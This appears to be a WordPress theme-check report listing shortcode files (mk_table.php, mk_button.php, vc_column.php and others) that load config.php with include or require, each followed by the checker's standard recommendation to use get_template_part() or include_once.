    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_table.php
    Ligne3: include ($path . '/config.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_social_networks.php
    Ligne3: include ($path . '/config.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_blog_carousel.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_blog_teaser.php
    Ligne5: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_flexslider.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_button.php
    Ligne6: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_photo_album.php
    Ligne4: include( $path . '/config.php' );
    Ligne125: <?php include( $path . '/tpl-photo-album.php' ); ?>
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_blog_showcase.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_testimonials.php
    Ligne4: include ($path . '/config.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_fancy_title.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_blockquote.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : vc_column.php
    Ligne5: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : vc_accordions.php
    Ligne5: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes